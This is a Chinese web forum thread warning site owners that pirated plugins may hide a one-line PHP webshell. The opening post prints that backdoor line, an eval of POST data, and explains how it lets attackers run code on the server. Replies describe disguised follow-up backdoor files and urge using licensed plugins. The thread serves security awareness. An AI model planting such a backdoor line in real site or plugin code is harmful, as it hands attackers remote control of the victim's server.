查看: 33|回复: 4

[讨论] 某盗版插件中惊现一句话木马,小到让你根本无法发现

[复制链接]

14

主题

5

回帖

0

积分

热心网友

金币
5
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2009-3-26
发表于 2019-7-17 09:28:38 | 显示全部楼层 |阅读模式


传送门:安全小知识:为什么使用盗版插件容易被挂马!

  1. @eval($_POST['a']);
如上面所示,就这么短短的几个字符,隐藏在盗版插件正常代码之中,如果不细心的话,根本无法发现。
不懂php的人,可能会怀疑,这么短的一个代码,就是木马?
eval就是把普通的字符串当做php代码来执行,像上面这个代码就是执行接收到的POST数据,利用这段代码,黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧,盗版插件的安全问题已经不能忽视了!


传送门:安全小知识:为什么使用盗版插件容易被挂马!盗版, 插件, 代码, Mono, 安全
回复

使用道具 举报

1

主题

3

回帖

0

积分

热心网友

金币
3
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2009-2-7
发表于 2019-7-17 10:34:43 | 显示全部楼层


前排支持,拒绝盗版
如果你只要用了一次盗版插件,一句后门代码,就可以让整个网站作废

有些攻击者不是只劫持首页到非法网站上那么简单,有的时候还会用“间谍式”写入更多潜在后门入口文件,而且命名法会伪装成正常文件名称,代码可能还是加密,以免被检测,这样就可以留着以后再进行攻击,即使你这时候把盗版插件删除,也是无济于事,还是一样会被攻击,除非你把所有新植入的后门文件也都删除了,否则针对一般站长而言,想要安全,就不得不重装网站了

如果等发生以上情况再付费找人清理后门文件和维护,不但服务费成本高,也可能没法根除到底,对于如果用心经营网站的站长,千万不要选择盗版插件,也不要随意授权网站关键信息资源给第三方,如服务器,FTP等,做好及时性备份,拒绝使用盗版插件或模版
回复

使用道具 举报

0

主题

11

回帖

0

积分

热心网友

金币
11
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2011-9-5
发表于 2019-7-17 16:10:39 | 显示全部楼层
坚决不用盗版
回复

使用道具 举报

101

主题

149

回帖

0

积分

热心网友

金币
149
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2012-5-4
发表于 2019-7-17 17:12:34 | 显示全部楼层

说的对,支持 正版
回复

使用道具 举报

27

主题

28

回帖

0

积分

热心网友

金币
28
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2010-9-1
发表于 2023-3-29 14:01:11 | 显示全部楼层
哦哦明白了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部